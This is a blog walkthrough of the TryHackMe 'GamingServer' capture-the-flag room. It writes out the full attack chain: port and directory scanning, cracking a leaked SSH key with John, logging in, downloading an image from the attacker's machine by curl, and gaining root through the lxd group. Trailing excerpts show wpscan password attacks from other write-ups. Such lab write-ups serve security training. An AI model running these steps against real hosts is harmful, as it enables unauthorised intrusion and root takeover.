GamingServer | TryHackMe | by Valerie23

LINK TO THE ROOM: GamingServer

NMAP SCAN

Let’s do nmap first and see what do we get.

nmap -Pn -sV 10.10.159.106

nmap scan

The results come back showing :
Port 22 & 80.
Since we don't have any credentials lets enumerate port 80 first.

GOBUSTER 

Lets fireup a gobuster scan for finding hidden directories.
gobuster dir -u http://10.10.159.106/ -w /usr/share/wordlists/dirb/common.txt -t 50

gobuster scan


WEB ANALYSIS

Visiting port 80. And checking its source code gives us a username.

source code

Lets visit some of the interesting directories that we found earlier from gobuster scan.
/uploads

It has a dictionary list that looks like a list of passwords. So we will just copy and paste the content into a new file.
And now we are going to visit another directory /secret to find the secrets.

SSH KEY


Looks like a ssh key but encrypted.
In order to decrypt the ssh key we first need to copy and paste it into a file then find its password.
Used commands:
locate ssh2john
/usr/share/john/ssh2john.py sshkey > key_hash
Now the file key_hash contains the hash for the password of sshkey and we are trying to crack it with next command.
sudo john --wordlist=wordlist.txt key_hash


So now we have its password. Time to decrypt the sshkey and connect to port 22.
openssl rsa -in sshkey -out deckey
Now we have a decrypted key and we should change its permission to "protected" before trying to connect to ssh.
chmod 600 deckey
Finally we type in the command for connecting to ssh.
ssh -i deckey john@10.10.159.106
decrypting ssh key

We can now read and submit the user flag.

PRIVILEGE ESCALATION

The id command gives us the following output:

id

Notice the 108(lxd) in output. So we try to list its images using the command
lxc image list


But there are no images, so we now take lxd alpine buider into the target machine using the curl command.
lxd alpine builder can be downloaded from the following link:


On the attacking machine after downloading alpine-builder start the python server.
python3 -m http.server
On the target machine change into a writable directory then type
curl http://10.9.121.2:8000/alpine.tar.gz --output alpine.tar.gz

We can take help from the link given below for further process:

lxc image list

We can added an image named valerie to lxc using the command:
lxc image import ./alpine.tar.gz --alias valerie
we can check the images using the command:
lxc image list


lxc init valerie gaming -c security.privileged=true
lxc config device add gaming mydevice disk source=/root path=/mnt/root recursive=true
lxc start gaming
lxc exec gaming /bin/sh
In the above commands we created a container named gaming having all the privileges and mounted the /root directory to /mnt/root then executed /bin/sh 
Now we can read the root flag.

Thankyou for reading.

                                                                                 --by Valerie23



Comments

  1. AnonymousSeptember 6, 2020 at 11:39 PM

    Thanks for the walkthrough.. and I love the way you explain things :)

    ReplyDelete
    Replies
    1. Valerie23September 10, 2020 at 2:02 AM

      Thank you for making an effort to write your feedback.

      Delete

Post a Comment

Popular posts from this blog

THM: Blog Room Writeup

Image
Here is the link of this great room:  Blog by Nameless0ne . L et's start guys.. Enumeration First I ran the nmap scan: 1.First lets check out the Blog itself running on the port 80. From little enumeration we can say that this is a simple blog running on the Wordpress. 2. The blog contains a single post by a user named Karen Wheeler for Billy joel. 3. To enumerate the users on the blog I will be using WPscan.           wpscan --url blog.thm -e u This command will list all the users on the Blog, bjoel & kwheel. 4. Let's try to find out the password of these users using the same tool again.          wpscan -U username --password <pass file> -t 30 --password-attack wp-login --url blog.thm 5. Try to run your own command. It won't take long before the password pops. (hint: try Mom name) 6. After login into the wordpress I saw the user had very limited capabilities so there must be some other way to the shell or some k...
Read more

LOOKING GLASS Write-up | TryHackMe | by Valerie23

Image
LOOKING  GLASS: https://tryhackme.com /room/lookingglass   NMAP Starting with a simple nmap scan to see which ports are open and what services are running on these ports. Nmap scan results in a long list of open ports ranging from 9000 to 13783. And the ssh service is running on all these ports so lets try connecting to one of the Dropbear ports (for username - you can use any random name). When we try connecting to port 9000 it tells us to go " lower " which we cannot do since 9000 is the lowermost open port (apart from 22). And when we try connecting to the uppermost open port 13783 , it tell us to go higher which is again impossible. So now we visit tryhackme again and take the hint given in user flag which says "A looking glass is a mirror" . So the output messages are mirrored. When it prints "LOWER" we actually need to go higher and vice-versa. So lets try to find the real port while shrinking the range  ssh toii@10.10.128.154 -o StrictHostKeyCheckin...
Read more